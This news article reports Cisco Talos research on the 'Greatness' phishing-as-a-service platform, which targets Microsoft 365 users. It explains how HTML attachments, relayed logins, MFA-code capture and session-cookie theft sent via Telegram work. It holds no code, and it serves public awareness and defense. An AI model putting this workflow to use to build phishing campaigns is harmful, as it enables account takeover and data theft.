The 'Greatness' phishing-as-a-service (PhaaS) platform has experienced an increase in activity as it targets organisations using Microsoft 365 in the United States, Canada, the United Kingdom, Australia, and South Africa.
The Microsoft 365 cloud-based productivity tool is used by many organisations globally, making it a lucrative target for cybercriminals looking to steal data or credentials for use in network breaches.
Researchers at Cisco Talos describe how the Greatness phishing platform started operating in the middle of 2022, with a surge in activity in December 2022 and then again in March 2023.
Most victims are based in the United States, and many of them are employed in industries like manufacturing, healthcare, technology, education, real estate, construction, finance, and business services.
Modus operandi
The Greatness Phishing-as-a-Service includes everything a would-be phishing actor needs to run a successful campaign.
To conduct an assault, the service user logs into the 'Greatness' admin panel with their API key and a list of target email addresses.
The PhaaS platform allocates the required infrastructure, such as the server that will host the phishing website and generate the HTML attachment.
The affiliate then creates the email's content, offers any additional information, and makes any necessary adjustments to the preset settings.
The victims then receive an email from the service containing a phishing attachment in HTML. When this attachment is opened, the browser runs obfuscated JavaScript code to establish a connection with the 'Greatness' server and retrieve the phishing page that will be shown to the user.
As Greatness pre-fills the proper email to provide the impression of validity, the victim just enters their password on the convincing phishing page.
In order to secure a valid session cookie for the target account, the phishing platform now manages the authentication flow between the victim's browser and the genuine Microsoft 365 login page.
'Greatness' will urge the victim to enter it if the account is two-factor authenticated while initiating a request on the genuine Microsoft service to send the one-time code to the target's device.
Following the entry of the MFA code, Greatness will log in as the victim on the genuine Microsoft platform and send the authenticated session cookie to the affiliate via a Telegram channel or the service's web panel.
"Authenticated sessions usually time out after a while, which is possibly one of the reasons the telegram bot is used - it informs the attacker about valid cookies as soon as possible to ensure they can reach quickly if the target is interesting," stated Cisco.
The attackers can then access the victim's email, files, and data in Microsoft 365 services via this session cookie.
Frequently, the stolen credentials are also used to break into business networks, resulting in even riskier activities like the distribution of ransomware.